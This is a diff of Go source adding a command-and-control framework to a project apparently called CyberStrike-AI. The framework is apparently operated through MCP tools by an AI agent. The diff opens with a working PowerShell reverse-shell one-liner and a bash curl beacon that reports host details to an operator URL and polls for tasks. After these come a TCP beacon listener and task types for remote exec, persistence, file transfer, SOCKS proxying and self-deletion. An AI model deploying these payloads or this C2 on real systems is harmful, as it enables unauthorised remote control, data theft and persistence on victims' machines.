`$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`,
|
||||
host, in.Port,
|
||||
)
|
||||
return fmt.Sprintf(
|
||||
`powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`,
|
||||
utf16LEBase64(ps),
|
||||
), nil
|
||||
|
||||
case OnelinerCurl:
|
||||
if strings.TrimSpace(in.HTTPBaseURL) == "" {
|
||||
return "", fmt.Errorf("http_base_url is required for curl_beacon")
|
||||
}
|
||||
if strings.TrimSpace(in.ImplantToken) == "" {
|
||||
return "", fmt.Errorf("implant_token is required for curl_beacon")
|
||||
}
|
||||
base := strings.TrimRight(in.HTTPBaseURL, "/")
|
||||
return fmt.Sprintf(
|
||||
`bash -c 'H="X-Implant-Token: %s";`+
|
||||
`URL="%s";`+
|
||||
`HN=$(hostname 2>/dev/null||echo unknown);`+
|
||||
`UN=$(whoami 2>/dev/null||echo unknown);`+
|
||||
`OS=$(uname -s 2>/dev/null||echo unknown);`+
|
||||
`AR=$(uname -m 2>/dev/null||echo unknown);`+
|
||||
`IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+
|
||||
`SID="";`+
|
||||
`while :;do `+
|
||||
`BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+
|
||||
`R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 2>/dev/null);`+
|
||||
`if [ -n "$R" ]&&[ -z "$SID" ];then SID=$(echo "$R"|grep -o "\"session_id\":\"[^\"]*\""|head -1|cut -d"\"" -f4);fi;`+
|
||||
`if [ -n "$SID" ];then `+
|
||||
`T=$(curl -fsSk -H "$H" -G "$URL/tasks?session_id=$SID" 2>/dev/null);`+
|
||||
`fi;`+
|
||||
`sleep 5;`+
|
||||
`done' &`,
|
||||
in.ImplantToken, base,
|
||||
), nil
|
||||
}
|
||||
return "", fmt.Errorf("unsupported oneliner kind: %s", in.Kind)
|
||||
}
|
||||
|
||||
// urlEncodeForShell URL 编码字符串,避免特殊字符在 shell 中破坏转义
|
||||
func urlEncodeForShell(s string) string {
|
||||
return url.QueryEscape(s)
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,109 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"context"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话,
|
||||
// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。
|
||||
//
|
||||
// 设计要点:
|
||||
// - 单 goroutine + ticker,避免对每个会话开 timer,session 数量大时也线性 OK;
|
||||
// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定);
|
||||
// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判;
|
||||
// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。
|
||||
type SessionWatchdog struct {
|
||||
manager *Manager
|
||||
logger *zap.Logger
|
||||
interval time.Duration // 扫描周期,默认 15s
|
||||
minGrace time.Duration // 最小宽限期,默认 30s
|
||||
gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线)
|
||||
stopCh chan struct{}
|
||||
}
|
||||
|
||||
// NewSessionWatchdog 创建看门狗
|
||||
func NewSessionWatchdog(m *Manager) *SessionWatchdog {
|
||||
return &SessionWatchdog{
|
||||
manager: m,
|
||||
logger: m.Logger().With(zap.String("component", "c2-watchdog")),
|
||||
interval: 15 * time.Second,
|
||||
minGrace: 30 * time.Second,
|
||||
gracePct: 3.0,
|
||||
stopCh: make(chan struct{}),
|
||||
}
|
||||
}
|
||||
|
||||
// Run 阻塞执行,直到 ctx.Done() 或 Stop()
|
||||
func (w *SessionWatchdog) Run(ctx context.Context) {
|
||||
t := time.NewTicker(w.interval)
|
||||
defer t.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-w.stopCh:
|
||||
return
|
||||
case <-t.C:
|
||||
w.tick()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Stop 停止
|
||||
func (w *SessionWatchdog) Stop() {
|
||||
select {
|
||||
case <-w.stopCh:
|
||||
default:
|
||||
close(w.stopCh)
|
||||
}
|
||||
}
|
||||
|
||||
func (w *SessionWatchdog) tick() {
|
||||
now := time.Now()
|
||||
for _, status := range []string{string(SessionActive), string(SessionSleeping)} {
|
||||
sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status})
|
||||
if err != nil {
|
||||
w.logger.Warn("watchdog 列表查询失败", zap.Error(err))
|
||||
continue
|
||||
}
|
||||
for _, s := range sessions {
|
||||
if w.isStale(s, now) {
|
||||
if err := w.manager.MarkSessionDead(s.ID); err != nil {
|
||||
w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// isStale 判断会话是否超时
|
||||
func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool {
|
||||
// 无心跳记录:以 first_seen_at 兜底
|
||||
last := s.LastCheckIn
|
||||
if last.IsZero() {
|
||||
last = s.FirstSeenAt
|
||||
}
|
||||
sleep := s.SleepSeconds
|
||||
if sleep <= 0 {
|
||||
// TCP reverse 模式 sleep=0 → 用最小宽限期判定
|
||||
return now.Sub(last) > w.minGrace*2
|
||||
}
|
||||
jitter := s.JitterPercent
|
||||
if jitter < 0 {
|
||||
jitter = 0
|
||||
}
|
||||
if jitter > 100 {
|
||||
jitter = 100
|
||||
}
|
||||
// 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底
|
||||
expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second
|
||||
if expected < w.minGrace {
|
||||
expected = w.minGrace
|
||||
}
|
||||
return now.Sub(last) > expected
|
||||
}
|
||||
@@ -0,0 +1,267 @@
|
||||
package c2
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"crypto/subtle"
|
||||
"encoding/base64"
|
||||
"encoding/binary"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"net"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
|
||||
const tcpBeaconMagic = "CSB1"
|
||||
|
||||
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
|
||||
const tcpBeaconMaxFrame = 64 << 20
|
||||
|
||||
func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) {
|
||||
var n uint32
|
||||
if err = binary.Read(r, binary.BigEndian, &n); err != nil {
|
||||
return "", err
|
||||
}
|
||||
if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) {
|
||||
return "", fmt.Errorf("invalid tcp beacon frame size")
|
||||
}
|
||||
buf := make([]byte, n)
|
||||
if _, err = io.ReadFull(r, buf); err != nil {
|
||||
return "", err
|
||||
}
|
||||
return string(buf), nil
|
||||
}
|
||||
|
||||
func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error {
|
||||
if mu != nil {
|
||||
mu.Lock()
|
||||
defer mu.Unlock()
|
||||
}
|
||||
payload := []byte(cipherB64)
|
||||
if len(payload) > tcpBeaconMaxFrame {
|
||||
return fmt.Errorf("frame too large")
|
||||
}
|
||||
var hdr [4]byte
|
||||
binary.BigEndian.PutUint32(hdr[:], uint32(len(payload)))
|
||||
if _, err := conn.Write(hdr[:]); err != nil {
|
||||
return err
|
||||
}
|
||||
_, err := conn.Write(payload)
|
||||
return err
|
||||
}
|
||||
|
||||
func tcpBeaconCheckToken(expected, got string) bool {
|
||||
if got == "" || expected == "" {
|
||||
return false
|
||||
}
|
||||
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
|
||||
}
|
||||
|
||||
// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。
|
||||
func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) {
|
||||
var writeMu sync.Mutex
|
||||
defer func() {
|
||||
_ = conn.Close()
|
||||
}()
|
||||
|
||||
for {
|
||||
_ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute))
|
||||
cipherB64, err := readTCPBeaconFrame(br)
|
||||
if err != nil {
|
||||
if err != io.EOF && !isClosedConnErr(err) {
|
||||
l.logger.Debug("tcp beacon read frame", zap.Error(err))
|
||||
}
|
||||
return
|
||||
}
|
||||
plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64)
|
||||
if err != nil {
|
||||
l.logger.Warn("tcp beacon decrypt failed", zap.Error(err))
|
||||
return
|
||||
}
|
||||
|
||||
var env map[string]json.RawMessage
|
||||
if err := json.Unmarshal(plain, &env); err != nil {
|
||||
l.logger.Warn("tcp beacon json", zap.Error(err))
|
||||
return
|
||||
}
|
||||
opBytes, ok := env["op"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var op string
|
||||
if err := json.Unmarshal(opBytes, &op); err != nil {
|
||||
return
|
||||
}
|
||||
var token string
|
||||
if tb, ok := env["token"]; ok {
|
||||
_ = json.Unmarshal(tb, &token)
|
||||
}
|
||||
if !tcpBeaconCheckToken(l.rec.ImplantToken, token) {
|
||||
l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID))
|
||||
return
|
||||
}
|
||||
|
||||
var resp interface{}
|
||||
switch op {
|
||||
case "check_in":
|
||||
rawCheck, ok := env["check"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var req ImplantCheckInRequest
|
||||
if err := json.Unmarshal(rawCheck, &req); err != nil {
|
||||
return
|
||||
}
|
||||
if req.UserAgent == "" {
|
||||
req.UserAgent = "tcp_beacon"
|
||||
}
|
||||
if req.SleepSeconds <= 0 {
|
||||
req.SleepSeconds = l.cfg.DefaultSleep
|
||||
}
|
||||
host, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
|
||||
if req.Metadata == nil {
|
||||
req.Metadata = map[string]interface{}{}
|
||||
}
|
||||
req.Metadata["transport"] = "tcp_beacon"
|
||||
req.Metadata["remote"] = conn.RemoteAddr().String()
|
||||
if strings.TrimSpace(req.InternalIP) == "" {
|
||||
req.InternalIP = host
|
||||
}
|
||||
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
|
||||
if err != nil {
|
||||
l.logger.Warn("tcp beacon check_in", zap.Error(err))
|
||||
return
|
||||
}
|
||||
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
|
||||
SessionID: session.ID,
|
||||
Status: string(TaskQueued),
|
||||
Limit: 1,
|
||||
})
|
||||
resp = ImplantCheckInResponse{
|
||||
SessionID: session.ID,
|
||||
NextSleep: session.SleepSeconds,
|
||||
NextJitter: session.JitterPercent,
|
||||
HasTasks: len(queued) > 0,
|
||||
ServerTime: NowUnixMillis(),
|
||||
}
|
||||
|
||||
case "tasks":
|
||||
rawSID, ok := env["session_id"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var sessionID string
|
||||
if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" {
|
||||
return
|
||||
}
|
||||
sess, err := l.manager.DB().GetC2Session(sessionID)
|
||||
if err != nil || sess == nil || sess.ListenerID != l.rec.ID {
|
||||
return
|
||||
}
|
||||
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
if envelopes == nil {
|
||||
envelopes = []TaskEnvelope{}
|
||||
}
|
||||
resp = map[string]interface{}{"tasks": envelopes}
|
||||
|
||||
case "result":
|
||||
raw, ok := env["result"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var report TaskResultReport
|
||||
if err := json.Unmarshal(raw, &report); err != nil {
|
||||
return
|
||||
}
|
||||
if err := l.manager.IngestTaskResult(report); err != nil {
|
||||
return
|
||||
}
|
||||
resp = map[string]string{"ok": "1"}
|
||||
|
||||
case "upload":
|
||||
raw, ok := env["upload"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var up struct {
|
||||
TaskID string `json:"task_id"`
|
||||
DataB64 string `json:"data_b64"`
|
||||
}
|
||||
if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" {
|
||||
return
|
||||
}
|
||||
plainFile, err := base64.StdEncoding.DecodeString(up.DataB64)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
dir := filepath.Join(l.manager.StorageDir(), "uploads")
|
||||
if err := os.MkdirAll(dir, 0o755); err != nil {
|
||||
return
|
||||
}
|
||||
dst := filepath.Join(dir, up.TaskID+".bin")
|
||||
if err := os.WriteFile(dst, plainFile, 0o644); err != nil {
|
||||
return
|
||||
}
|
||||
resp = map[string]interface{}{"ok": 1, "size": len(plainFile)}
|
||||
|
||||
case "file":
|
||||
raw, ok := env["file"]
|
||||
if !ok {
|
||||
return
|
||||
}
|
||||
var fr struct {
|
||||
FileID string `json:"file_id"`
|
||||
}
|
||||
if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" {
|
||||
return
|
||||
}
|
||||
if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") {
|
||||
return
|
||||
}
|
||||
fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin")
|
||||
absPath, err := filepath.Abs(fpath)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
|
||||
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
|
||||
return
|
||||
}
|
||||
data, err := os.ReadFile(absPath)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
resp = map[string]interface{}{
|
||||
"file_data": base64Encode(data),
|
||||
}
|
||||
|
||||
default:
|
||||
return
|
||||
}
|
||||
|
||||
body, err := json.Marshal(resp)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
_ = conn.SetWriteDeadline(time.Now().Add(3 * time.Minute))
|
||||
if err := writeTCPBeaconFrame(&writeMu, conn, enc); err != nil {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
+258
@@ -0,0 +1,258 @@
|
||||
// Package c2 实现 CyberStrikeAI 内置 C2(Command & Control)框架。
|
||||
//
|
||||
// 设计概述:
|
||||
// - Manager 作为统一入口,被 internal/app 实例化并注入到所有需要操控 C2 的组件
|
||||
// (HTTP handler、MCP 工具、HITL 桥、攻击链记录器等)。
|
||||
// - Listener 是抽象接口,下挂 tcp_reverse / http_beacon / https_beacon / websocket
|
||||
// 等不同传输方式的具体实现,全部通过 listener.Registry 工厂创建。
|
||||
// - 任务调度走数据库(c2_tasks 表)+ 内存事件总线(EventBus)混合:
|
||||
// * 状态变化与历史记录靠 SQLite 实现持久化与重启恢复;
|
||||
// * 高频实时通知(如新任务结果)通过 EventBus 推送给 SSE/WS 订阅者,避免轮询。
|
||||
// - Crypto 层固定 AES-256-GCM,每个 Listener 独立 32 字节密钥;密钥仅服务端持有
|
||||
// 和编译期注入到 implant,事件流不允许导出明文密钥。
|
||||
package c2
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
// ListenerType 监听器类型,与 c2_listeners.type 字段一致
|
||||
type ListenerType string
|
||||
|
||||
const (
|
||||
ListenerTypeTCPReverse ListenerType = "tcp_reverse"
|
||||
ListenerTypeHTTPBeacon ListenerType = "http_beacon"
|
||||
ListenerTypeHTTPSBeacon ListenerType = "https_beacon"
|
||||
ListenerTypeWebSocket ListenerType = "websocket"
|
||||
)
|
||||
|
||||
// AllListenerTypes 列出所有受支持的监听器类型,便于校验与前端枚举
|
||||
func AllListenerTypes() []ListenerType {
|
||||
return []ListenerType{
|
||||
ListenerTypeTCPReverse,
|
||||
ListenerTypeHTTPBeacon,
|
||||
ListenerTypeHTTPSBeacon,
|
||||
ListenerTypeWebSocket,
|
||||
}
|
||||
}
|
||||
|
||||
// IsValidListenerType 校验前端/MCP 入参是否为合法 type
|
||||
func IsValidListenerType(t string) bool {
|
||||
t = strings.ToLower(strings.TrimSpace(t))
|
||||
for _, lt := range AllListenerTypes() {
|
||||
if string(lt) == t {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// SessionStatus 与 c2_sessions.status 一致
|
||||
type SessionStatus string
|
||||
|
||||
const (
|
||||
SessionActive SessionStatus = "active"
|
||||
SessionSleeping SessionStatus = "sleeping"
|
||||
SessionDead SessionStatus = "dead"
|
||||
SessionKilled SessionStatus = "killed"
|
||||
)
|
||||
|
||||
// TaskStatus 与 c2_tasks.status 一致
|
||||
type TaskStatus string
|
||||
|
||||
const (
|
||||
TaskQueued TaskStatus = "queued"
|
||||
TaskSent TaskStatus = "sent"
|
||||
TaskRunning TaskStatus = "running"
|
||||
TaskSuccess TaskStatus = "success"
|
||||
TaskFailed TaskStatus = "failed"
|
||||
TaskCancelled TaskStatus = "cancelled"
|
||||
)
|
||||
|
||||
// TaskType 任务类型(与 beacon 端协商,避免硬编码字符串)
|
||||
type TaskType string
|
||||
|
||||
const (
|
||||
// 通用任务
|
||||
TaskTypeExec TaskType = "exec" // 执行任意命令(shell -c)
|
||||
TaskTypeShell TaskType = "shell" // 交互式命令(保持 cwd)
|
||||
TaskTypePwd TaskType = "pwd" // 当前目录
|
||||
TaskTypeCd TaskType = "cd" // 切目录
|
||||
TaskTypeLs TaskType = "ls" // 列目录
|
||||
TaskTypePs TaskType = "ps" // 列进程
|
||||
TaskTypeKillProc TaskType = "kill_proc" // 杀进程
|
||||
TaskTypeUpload TaskType = "upload" // 推文件到目标
|
||||
TaskTypeDownload TaskType = "download" // 拉文件回本机
|
||||
TaskTypeScreenshot TaskType = "screenshot" // 截图
|
||||
TaskTypeSleep TaskType = "sleep" // 调整心跳节律
|
||||
TaskTypeExit TaskType = "exit" // 让 implant 退出(不会自删二进制)
|
||||
TaskTypeSelfDelete TaskType = "self_delete" // 退出 + 自删二进制(持久化清理)
|
||||
// 高级任务
|
||||
TaskTypePortFwd TaskType = "port_fwd"
|
||||
TaskTypeSocksStart TaskType = "socks_start"
|
||||
TaskTypeSocksStop TaskType = "socks_stop"
|
||||
TaskTypeLoadAssembly TaskType = "load_assembly"
|
||||
TaskTypePersist TaskType = "persist"
|
||||
)
|
||||
|
||||
// AllTaskTypes 全部 task_type,便于工具 schema 列出 enum
|
||||
func AllTaskTypes() []TaskType {
|
||||
return []TaskType{
|
||||
TaskTypeExec, TaskTypeShell,
|
||||
TaskTypePwd, TaskTypeCd, TaskTypeLs, TaskTypePs, TaskTypeKillProc,
|
||||
TaskTypeUpload, TaskTypeDownload, TaskTypeScreenshot,
|
||||
TaskTypeSleep, TaskTypeExit, TaskTypeSelfDelete,
|
||||
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeSocksStop, TaskTypeLoadAssembly,
|
||||
TaskTypePersist,
|
||||
}
|
||||
}
|
||||
|
||||
// IsDangerousTaskType 标记需要 HITL 二次确认的任务类型;
|
||||
// 与 internal/handler/hitl.go 现有的 tool_whitelist 概念呼应:白名单外 → 走审批。
|
||||
func IsDangerousTaskType(t TaskType) bool {
|
||||
switch t {
|
||||
case TaskTypeKillProc, TaskTypeUpload, TaskTypeSelfDelete,
|
||||
TaskTypePortFwd, TaskTypeSocksStart, TaskTypeLoadAssembly, TaskTypePersist:
|
||||
return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// ListenerConfig 解码后的监听器运行配置(来自 c2_listeners.config_json)
|
||||
type ListenerConfig struct {
|
||||
// HTTP/HTTPS Beacon 公共字段
|
||||
BeaconCheckInPath string `json:"beacon_check_in_path,omitempty"` // 默认 "/check_in"
|
||||
BeaconTasksPath string `json:"beacon_tasks_path,omitempty"` // 默认 "/tasks"
|
||||
BeaconResultPath string `json:"beacon_result_path,omitempty"` // 默认 "/result"
|
||||
BeaconUploadPath string `json:"beacon_upload_path,omitempty"` // 默认 "/upload"
|
||||
BeaconFilePath string `json:"beacon_file_path,omitempty"` // 默认 "/file/"
|
||||
// HTTPS 专属
|
||||
TLSCertPath string `json:"tls_cert_path,omitempty"`
|
||||
TLSKeyPath string `json:"tls_key_path,omitempty"`
|
||||
TLSAutoSelfSign bool `json:"tls_auto_self_sign,omitempty"` // true:找不到证书时自动生成自签
|
||||
// 客户端默认参数(写到 c2_sessions 初值,beacon 也可在 check-in 时覆写)
|
||||
DefaultSleep int `json:"default_sleep,omitempty"` // 秒,默认 5
|
||||
DefaultJitter int `json:"default_jitter,omitempty"` // 0-100,默认 0
|
||||
// OPSEC:可选命令黑名单(正则)
|
||||
CommandDenyRegex []string `json:"command_deny_regex,omitempty"`
|
||||
// 任务并发上限(每个会话同时下发的最大任务数,0 表示不限制)
|
||||
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
|
||||
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
|
||||
CallbackHost string `json:"callback_host,omitempty"`
|
||||
}
|
||||
|
||||
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
|
||||
func (c *ListenerConfig) ApplyDefaults() {
|
||||
if strings.TrimSpace(c.BeaconCheckInPath) == "" {
|
||||
c.BeaconCheckInPath = "/check_in"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconTasksPath) == "" {
|
||||
c.BeaconTasksPath = "/tasks"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconResultPath) == "" {
|
||||
c.BeaconResultPath = "/result"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconUploadPath) == "" {
|
||||
c.BeaconUploadPath = "/upload"
|
||||
}
|
||||
if strings.TrimSpace(c.BeaconFilePath) == "" {
|
||||
c.BeaconFilePath = "/file/"
|
||||
}
|
||||
if c.DefaultSleep <= 0 {
|
||||
c.DefaultSleep = 5
|
||||
}
|
||||
if c.DefaultJitter < 0 {
|
||||
c.DefaultJitter = 0
|
||||
}
|
||||
if c.DefaultJitter > 100 {
|
||||
c.DefaultJitter = 100
|
||||
}
|
||||
}
|
||||
|
||||
// ImplantCheckInRequest beacon → 服务端的注册/心跳请求体(已解密后的明文)
|
||||
type ImplantCheckInRequest struct {
|
||||
ImplantUUID string `json:"uuid"`
|
||||
Hostname string `json:"hostname"`
|
||||
Username string `json:"username"`
|
||||
OS string `json:"os"`
|
||||
Arch string `json:"arch"`
|
||||
PID int `json:"pid"`
|
||||
ProcessName string `json:"process_name"`
|
||||
IsAdmin bool `json:"is_admin"`
|
||||
InternalIP string `json:"internal_ip"`
|
||||
UserAgent string `json:"user_agent,omitempty"`
|
||||
SleepSeconds int `json:"sleep_seconds"`
|
||||
JitterPercent int `json:"jitter_percent"`
|
||||
Metadata map[string]interface{} `json:"metadata,omitempty"`
|
||||
}
|
||||
|
||||
// ImplantCheckInResponse 服务端回执
|
||||
type ImplantCheckInResponse struct {
|
||||
SessionID string `json:"session_id"`
|
||||
NextSleep int `json:"next_sleep"`
|
||||
NextJitter int `json:"next_jitter"`
|
||||
HasTasks bool `json:"has_tasks"`
|
||||
ServerTime int64 `json:"server_time"`
|
||||
}
|
||||
|
||||
// TaskEnvelope 服务端 → beacon 的任务派发载体
|
||||
type TaskEnvelope struct {
|
||||
TaskID string `json:"task_id"`
|
||||
TaskType string `json:"task_type"`
|
||||
Payload map[string]interface{} `json:"payload"`
|
||||
}
|
||||
|
||||
// TaskResultReport beacon → 服务端的任务结果回传
|
||||
type TaskResultReport struct {
|
||||
TaskID string `json:"task_id"`
|
||||
Success bool `json:"success"`
|
||||
Output string `json:"output,omitempty"`
|
||||
Error string `json:"error,omitempty"`
|
||||
BlobBase64 string `json:"blob_b64,omitempty"` // 如截图二进制
|
||||
BlobSuffix string `json:"blob_suffix,omitempty"` // 如 ".png"
|
||||
StartedAt int64 `json:"started_at"`
|
||||
EndedAt int64 `json:"ended_at"`
|
||||
}
|
||||
|
||||
// CommonError C2 模块统一错误类型,便于 handler 层映射 HTTP 状态码
|
||||
type CommonError struct {
|
||||
Code string
|
||||
Message string
|
||||
HTTP int
|
||||
}
|
||||
|
||||
func (e *CommonError) Error() string {
|
||||
if e == nil {
|
||||
return ""
|
||||
}
|
||||
return e.Message
|
||||
}
|
||||
|
||||
// Sentinel errors,便于 errors.Is 比较
|
||||
var (
|
||||
ErrListenerNotFound = &CommonError{Code: "listener_not_found", Message: "监听器不存在", HTTP: 404}
|
||||
ErrSessionNotFound = &CommonError{Code: "session_not_found", Message: "会话不存在", HTTP: 404}
|
||||
ErrTaskNotFound = &CommonError{Code: "task_not_found", Message: "任务不存在", HTTP: 404}
|
||||
ErrProfileNotFound = &CommonError{Code: "profile_not_found", Message: "Profile 不存在", HTTP: 404}
|
||||
ErrInvalidInput = &CommonError{Code: "invalid_input", Message: "参数非法", HTTP: 400}
|
||||
ErrAuthFailed = &CommonError{Code: "auth_failed", Message: "鉴权失败", HTTP: 401}
|
||||
ErrPortInUse = &CommonError{Code: "port_in_use", Message: "端口已被占用", HTTP: 409}
|
||||
ErrListenerRunning = &CommonError{Code: "listener_running", Message: "监听器已在运行", HTTP: 409}
|
||||
ErrListenerStopped = &CommonError{Code: "listener_stopped", Message: "监听器未运行", HTTP: 409}
|
||||
ErrUnsupportedType = &CommonError{Code: "unsupported_type", Message: "不支持的监听器类型", HTTP: 400}
|
||||
)
|
||||
|
||||
// SafeBindPort 校验端口范围
|
||||
func SafeBindPort(port int) error {
|
||||
if port < 1 || port > 65535 {
|
||||
return errors.New("port must be in 1..65535")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// NowUnixMillis 统一时间戳工具
|
||||
func NowUnixMillis() int64 {
|
||||
return time.Now().UnixNano() / int64(time.Millisecond)
|
||||
}
|
||||
+1304
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,66 @@
|
||||
package config
|
||||
|
||||
import (
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// expandEnvVar 展开字符串中的 ${VAR} 和 ${VAR:-default} 环境变量引用。
|
||||
// 与官方 MCP 配置格式一致(Claude Desktop / Cursor / VS Code 均支持此语法)。
|
||||
func expandEnvVar(s string) string {
|
||||
var b strings.Builder
|
||||
i := 0
|
||||
for i < len(s) {
|
||||
// 查找 ${
|
||||
idx := strings.Index(s[i:], "${")
|
||||
if idx < 0 {
|
||||
b.WriteString(s[i:])
|
||||
break
|
||||
}
|
||||
b.WriteString(s[i : i+idx])
|
||||
i += idx + 2 // skip ${
|
||||
|
||||
// 查找对应的 }
|
||||
end := strings.IndexByte(s[i:], '}')
|
||||
if end < 0 {
|
||||
// 没有 },原样保留
|
||||
b.WriteString("${")
|
||||
continue
|
||||
}
|
||||
expr := s[i : i+end]
|
||||
i += end + 1 // skip }
|
||||
|
||||
// 解析 VAR:-default
|
||||
varName := expr
|
||||
defaultVal := ""
|
||||
hasDefault := false
|
||||
if colonIdx := strings.Index(expr, ":-"); colonIdx >= 0 {
|
||||
varName = expr[:colonIdx]
|
||||
defaultVal = expr[colonIdx+2:]
|
||||
hasDefault = true
|
||||
}
|
||||
|
||||
val := os.Getenv(varName)
|
||||
if val == "" && hasDefault {
|
||||
val = defaultVal
|
||||
}
|
||||
b.WriteString(val)
|
||||
}
|
||||
return b.String()
|
||||
}
|
||||
|
||||
// ExpandConfigEnv 展开 ExternalMCPServerConfig 中所有支持环境变量的字段。
|
||||
// 展开范围:Command、Args、Env values、URL、Headers values。
|
||||
func ExpandConfigEnv(cfg *ExternalMCPServerConfig) {
|
||||
cfg.Command = expandEnvVar(cfg.Command)
|
||||
for i, arg := range cfg.Args {
|
||||
cfg.Args[i] = expandEnvVar(arg)
|
||||
}
|
||||
for k, v := range cfg.Env {
|
||||
cfg.Env[k] = expandEnvVar(v)
|
||||
}
|
||||
cfg.URL = expandEnvVar(cfg.URL)
|
||||
for k, v := range cfg.Headers {
|
||||
cfg.Headers[k] = expandEnvVar(v)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,81 @@
|
||||
package config
|
||||
|
||||
import (
|
||||
"os"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestExpandEnvVar(t *testing.T) {
|
||||
os.Setenv("TEST_MCP_VAR", "hello")
|
||||
os.Setenv("TEST_MCP_PATH", "/usr/local/bin")
|
||||
defer os.Unsetenv("TEST_MCP_VAR")
|
||||
defer os.Unsetenv("TEST_MCP_PATH")
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
input string
|
||||
expect string
|
||||
}{
|
||||
{"plain string", "no vars here", "no vars here"},
|
||||
